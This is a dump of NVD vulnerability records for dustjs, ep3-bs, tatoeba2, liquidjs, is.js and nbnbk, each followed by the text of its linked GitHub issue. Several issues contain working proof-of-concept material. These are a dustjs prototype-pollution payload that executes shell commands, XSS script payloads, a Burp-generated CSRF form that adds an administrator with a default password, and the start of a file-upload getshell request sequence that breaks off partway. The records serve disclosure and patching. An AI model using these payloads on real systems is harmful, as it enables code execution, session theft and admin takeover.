"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/linkedin/dustjs/commit/ddb6523832465d38c9d80189e9de60519ac307c3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/linkedin/dustjs/issues/804"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/linkedin/dustjs/pull/805"
},
{
"source": "cna@vuldb.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/linkedin/dustjs/releases/tag/v3.0.0"
},
{
"source": "cna@vuldb.com",
"tags": [
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.216464"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.216464"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/linkedin/dustjs/commit/ddb6523832465d38c9d80189e9de60519ac307c3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/linkedin/dustjs/issues/804"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/linkedin/dustjs/pull/805"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/linkedin/dustjs/releases/tag/v3.0.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.216464"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.216464"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:linkedin:dustjs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C1F928D6-5422-4F4F-B6B4-281A48D31745",
"versionEndExcluding": "3.0.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/linkedin/dustjs/issues/804 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"linkedin",
"dustjs"
] | Hi, I 'd like to report a security bug. That is, the current version of dustjs is vulnerable to prototype pollution attack. Details will be covered in following contents.
## reproduce
index.js
```javascript
const dust = require('dustjs-linkedin');
let cmd = "this.constructor.constructor('return process')().mainModule.require('child_process').execSync('curl 127.0.0.1')"
Object.prototype.ANY_CODE= [cmd];
const compiled = dust.compile(`{username} is a valid Dust reference.{~n}`);
const tmpl = dust.loadSource(compiled);
dust.render(tmpl, { username: "byc_404" }, (err, out) => {
if (err) throw err;
console.log(out);
});
```
use `python -m http.server 80` to set up a http server, then execute the code
result
```
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--100 694 100 694 0 0 694 0 0:00:01 --:--:-- 0:00:01 677k
byc_404 is a valid Dust reference.
```
```
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:127.0.0.1 - - [24/Mar/2021 22:19:39] "GET / HTTP/1.1" 200 -
```
Command of `curl` will be executed.
## Details
The code that pollution affected can be found at `compileBlocks` function
https://github.com/linkedin/dustjs/blob/e0e25f7c1bc5905090e8160c28b8e83ab7f34e20/lib/compiler.js#L171-L173
https://github.com/linkedin/dustjs/blob/e0e25f7c1bc5905090e8160c28b8e83ab7f34e20/lib/compiler.js#L189-L199
`blocks` is an Array attribute of object `context`, and the for loop will visit attribute on prototype, results in `blocks[ANY_CODE]=EVIL_CMD`.
The code will be added to `compiled`, then the full compiled code will be evaled and run in vm
https://github.com/linkedin/dustjs/blob/e0e25f7c1bc5905090e8160c28b8e83ab7f34e20/index.js#L8-L11
However, the context of vm here is `{dust: dust}`, so it can be bypassed with `this.constructor.constructor` and get Arbitary Command execution.
## Suggestion
* For `context` in compile function , use Map or `Object.create(null)` to create it.
* For `vm.runInContext` in loadSource function , use `Object.create(null)` to create it , then add `dust` to it. Or vm will be meaningless. | Security bug about prototype pollution | https://api.github.com/repos/linkedin/dustjs/issues/804/comments | 1 | 2021-03-24T15:11:06Z | 2021-03-26T06:52:11Z | https://github.com/linkedin/dustjs/issues/804 | 839,828,470 | 804 | 4,532 |
CVE-2022-4637 | 2022-12-21T22:15:08.480 | A vulnerability classified as problematic has been found in ep3-bs up to 1.7.x. This affects an unknown part. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.8.0 is able to address this issue. The name of the patch is ef49e709c8adecc3a83cdc6164a67162991d2213. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216495. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tkrebs/ep3-bs/commit/ef49e709c8adecc3a83cdc6164a67162991d2213"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tkrebs/ep3-bs/issues/564"
},
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tkrebs/ep3-bs/releases/tag/1.8.0"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216495"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tkrebs/ep3-bs/commit/ef49e709c8adecc3a83cdc6164a67162991d2213"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tkrebs/ep3-bs/issues/564"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tkrebs/ep3-bs/releases/tag/1.8.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216495"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ep-3bookingsystem:ep-3_bookingsystem:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B1CDEC05-C965-4BCD-920E-DCEBBD9D376D",
"versionEndExcluding": "1.8.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/tkrebs/ep3-bs/issues/564 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"tkrebs",
"ep3-bs"
] | Hi zusammen,
ich habe eventuell eine Vulnerability entdeckt. Zumindest als admin (Auswirkungen auf normale User und Möglichkeiten als normaler User müssen noch getestet werden) kann man per XSS eigenen JavaScript Code ausführen, indem man bsw. folgendes bei einer Buchung in das "booked to" Feld eingibt:
<script>console.log(document.cookie)</script>
Wenn man als User dann den Tag auswählt bei welchem die Buchung durchgeführt wird wird das JS ausgeführt.
In die Konsole loggen ist natürlich nicht weiter schlimm, aber man kann ja im Hintergrund ein Skript aufrufen oder ein Fake Form öffnen welches die Eingabe von Username und PW erfordert. etc.
Wie seht ihr das? | XSS Vulnerability? | https://api.github.com/repos/tkrebs/ep3-bs/issues/564/comments | 1 | 2022-09-04T16:06:40Z | 2022-10-07T00:56:05Z | https://github.com/tkrebs/ep3-bs/issues/564 | 1,361,189,747 | 564 | 4,533 |
CVE-2022-4642 | 2022-12-21T22:15:08.907 | A vulnerability was found in tatoeba2. It has been classified as problematic. This affects an unknown part of the component Profile Name Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version prod_2022-10-30 is able to address this issue. The name of the patch is 91110777fc8ddf1b4a2cf4e66e67db69b9700361. It is recommended to upgrade the affected component. The identifier VDB-216501 was assigned to this vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Tatoeba/tatoeba2/commit/91110777fc8ddf1b4a2cf4e66e67db69b9700361"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Tatoeba/tatoeba2/issues/3002"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Tatoeba/tatoeba2/releases/tag/prod_2022-10-30"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216501"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Tatoeba/tatoeba2/commit/91110777fc8ddf1b4a2cf4e66e67db69b9700361"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Tatoeba/tatoeba2/issues/3002"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Tatoeba/tatoeba2/releases/tag/prod_2022-10-30"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216501"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tatoeba:tatoeba2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B52C5FF1-449E-4FD6-B509-8264B0FB5C1C",
"versionEndExcluding": "2022-10-30",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/Tatoeba/tatoeba2/issues/3002 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Tatoeba",
"tatoeba2"
] | The profile name field on the website does not properly sanitize user input. For example, I was able to insert a picture as well as a JavaScript popup box into my profile name. This can allow for XSS attacks, which could lead to things such as sensitive information being stolen or the user's account being taken over.
The website also does not properly sanitize data input for the following fields: sentence reviews, sentence languages, profile languages, profile language levels, and birthday year. However, these issues are less severe since they appear to only allow for invalid data to be entered, and not malicious code execution. Inputting invalid data into these fields also requires the user to send an edited HTTP post request, which is less likely to happen than simply inputting data into the profile name field.
Steps To Reproduce:
**Unsanitized name input**
1) Open "https://dev.tatoeba.org/user/edit_profile" while being logged in.
2) In the "Name" field, insert some html code (for example <code><script>alert("hello")</script></code>) and then save.
3) Now when someone visits your profile, your name will display whatever html code you inserted.
**Unsanitized HTTP posts**
1) Perform an action on the website that sends a HTTP post request.
2) Log and save the HTTP post request that is sent (for example, using the developer tools in your web browser).
3) Edit the saved HTTP post request and change some of the values.
4) Send the edited HTTP post request to the website again.
I am not a security expert or web developer, so my understanding of these issues and their potential risks may be inaccurate. There may be other input fields on the website that do not properly sanitize user input. This bug report only covers what I have found. | Unsanitized input | https://api.github.com/repos/Tatoeba/tatoeba2/issues/3002/comments | 9 | 2022-10-22T17:54:11Z | 2023-09-04T06:50:58Z | https://github.com/Tatoeba/tatoeba2/issues/3002 | 1,419,427,998 | 3,002 | 4,534 |
CVE-2022-25948 | 2022-12-22T05:15:10.487 | The package liquidjs before 10.0.0 are vulnerable to Information Exposure when ownPropertyOnly parameter is set to False, which results in leaking properties of a prototype. Workaround For versions 9.34.0 and higher, an option to disable this functionality is provided. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/harttle/liquidjs/commit/7e99efc5131e20cf3f59e1fc2c371a15aa4109db"
},
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/harttle/liquidjs/commit/7eb621601c2b05d6e379e5ce42219f2b1f556208"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/harttle/liquidjs/issues/454"
},
{
"source": "report@snyk.io",
"tags": [
"Broken Link"
],
"url": "https://groups.google.com/u/0/a/snyk.io/g/report/c/9ipXecWRtTM/m/IgLadevtCQAJ"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JS-LIQUIDJS-2952868"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/harttle/liquidjs/commit/7e99efc5131e20cf3f59e1fc2c371a15aa4109db"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/harttle/liquidjs/commit/7eb621601c2b05d6e379e5ce42219f2b1f556208"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/harttle/liquidjs/issues/454"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://groups.google.com/u/0/a/snyk.io/g/report/c/9ipXecWRtTM/m/IgLadevtCQAJ"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JS-LIQUIDJS-2952868"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:liquidjs:liquidjs:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "705150F8-5A55-443D-AE5A-5A82874E8EFB",
"versionEndExcluding": "10.0.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"200"
] | 200 | https://github.com/harttle/liquidjs/issues/454 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"harttle",
"liquidjs"
] | I noticed that javascript string and array prototype functions may be getting leaked. I actually like some of them like `str.length` or `arr_var.length` rather than using `str | size` or `arr_var | size`. This seems to be non-standard liquid templating.
I'm just asking because I would like to keep the `.length` since it is more ergonomic when used in `{% if str.length > 5 %} ... {% endif %}`
I'm worried it may be removed in a future "fix". Is this a bug or a feature that getters like .length or .toUpperCase work? | leaking JS prototype getter functions in evaluation (eg, .length) | https://api.github.com/repos/harttle/liquidjs/issues/454/comments | 6 | 2022-01-22T22:09:52Z | 2022-07-16T15:55:29Z | https://github.com/harttle/liquidjs/issues/454 | 1,111,701,730 | 454 | 4,535 |
CVE-2020-26302 | 2022-12-22T21:15:08.877 | is.js is a general-purpose check library. Versions 0.9.0 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). is.js uses a regex copy-pasted from a gist to validate URLs. Trying to validate a malicious string can cause the regex to loop “forever." This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. is.js has no patch for this issue. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/arasatasaygin/is.js/issues/320"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://securitylab.github.com/advisories/GHSL-2020-295-redos-is.js"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/arasatasaygin/is.js/issues/320"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://securitylab.github.com/advisories/GHSL-2020-295-redos-is.js"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:is.js_project:is.js:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB03F6BF-42D8-4F49-B419-972FBF5CC3B7",
"versionEndExcluding": null,
"versionEndIncluding": "0.9.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1333"
] | 1333 | https://github.com/arasatasaygin/is.js/issues/320 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"arasatasaygin",
"is.js"
] |
Hello,
The [GitHub Security Lab team](https://securitylab.github.com/) has found a potential vulnerability in your project. Please create a [Security Advisory](https://docs.github.com/en/free-pro-team@latest/github/managing-security-vulnerabilities/creating-a-security-advisory) and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a [Security Policy](https://docs.github.com/en/free-pro-team@latest/github/managing-security-vulnerabilities/adding-a-security-policy-to-your-repository) containing a security email address to send the details to.
Kind regards,
A
| Security Issue: Request for contact | https://api.github.com/repos/arasatasaygin/is.js/issues/320/comments | 5 | 2020-11-30T14:21:02Z | 2023-01-05T07:28:21Z | https://github.com/arasatasaygin/is.js/issues/320 | 753,518,754 | 320 | 4,536 |
CVE-2022-46491 | 2022-12-22T23:15:09.073 | A Cross-Site Request Forgery (CSRF) vulnerability in the Add Administrator function of the default version of nbnbk allows attackers to arbitrarily add Administrator accounts. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Fanli2012/nbnbk/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Fanli2012/nbnbk/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nbnbk_project:nbnbk:-:*:*:*:*:*:*:*",
"matchCriteriaId": "38134F5C-6B97-44FB-8977-EC132D45B46D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/Fanli2012/nbnbk/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Fanli2012",
"nbnbk"
] | # nbnbk 存在 CSRF 添加后台用户
CSRF Add Background User in nbnbk
该漏洞可以通过 CSRF 的方式,无需知道管理员账号密码进入后台,即可在没有痕迹的添加管理员账户。
漏洞存在版本:default
This vulnerability can be accessed via CSRF to add an administrator account without knowing the administrator account password to the background.
Vulnerability Existing Version: default
## 具体实现
Specific implementation
http://nbnbk:8888/fladmin/login
通过打开 /fladmin/login 路径进入后台登陆界面
Enter the background login interface by opening/fladmin/login path

使用默认密码 admin888/123456 进入后台,找到用户管理列表里的 “管理员” 界面中的 “添加管理员” 功能点
Use the default password admin888/123456 to enter the background and find the Add Administrator function point in the Administrator interface in the User Management List

随意输入用户名和密码,点击保存。
Enter your username and password at will and click Save.

在 bp 查看请求数据包,然后通过 bp 生成 CSRF POC 代码。
复制后在本地新建文件,通过 `python -m http.server 8099` 开启本地的 web 服务。
View the request packet in BP and generate the CSRF POC code from bp.
Create a new file locally after copying, via `python-m http. Server 8099` Opens a local web service.
```
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://nbnbk:8888/fladmin/admin/add" method="POST" enctype="multipart/form-data">
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="pwd" value="123456" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="role_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```

点击 submit request 提交请求
Click submit request to submit the request

点击后提示添加成功
Hint to add success after clicking


查看我们的请求数据包
View our request packet

Origin 和 referer 是我们自己的服务。CSRF 添加管理员账号报告到此结束。
Origin and referer are our own services. This concludes the CSRF Add Administrator Account report. | 🛡️ CSRF Add Background User in nbnbk | https://api.github.com/repos/Fanli2012/nbnbk/issues/2/comments | 0 | 2022-03-02T03:13:10Z | 2022-03-04T05:40:20Z | https://github.com/Fanli2012/nbnbk/issues/2 | 1,156,282,817 | 2 | 4,537 |
CVE-2022-46493 | 2022-12-22T23:15:10.287 | Default version of nbnbk was discovered to contain an arbitrary file upload vulnerability via the component /api/User/download_img. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Fanli2012/nbnbk/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Fanli2012/nbnbk/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nbnbk_project:nbnbk:-:*:*:*:*:*:*:*",
"matchCriteriaId": "38134F5C-6B97-44FB-8977-EC132D45B46D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/Fanli2012/nbnbk/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Fanli2012",
"nbnbk"
] | # nbnbk 存在任意文件上传 Getshell
Nbnbk has any file upload Getshell
## 0x00 前言 Preface
该漏洞无需账号密码即可任意文件上传 Getshell,相当于两步请求直接获取机器权限。
漏洞存在版本:default
This vulnerability allows any file to be uploaded to the Getshell without an account password, which is equivalent to two-step requests for direct access to the machine.
Vulnerability Existing Version: default
## 0x01 漏洞复现 Vulnerability Reproduction
### 1.获取 token
文件上传的接口需要 access_token ,我们可以通过下面这个接口获取
Get token
The interface for file upload requires access_ Token, we can get it from this interface
```http
POST /api/login/wx_login HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close
openid=1&unionid=1&sex=1&head_img=1&nickname=1
```
可以在返回包中发现 token 已经生成
You can find that token has been generated in the return package
```
HTTP/1.1 200 OK
Date: Wed, 02 Mar 2022 01:37:25 GMT
Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 831
Connection: close
Content-Type: text/html; charset=UTF-8
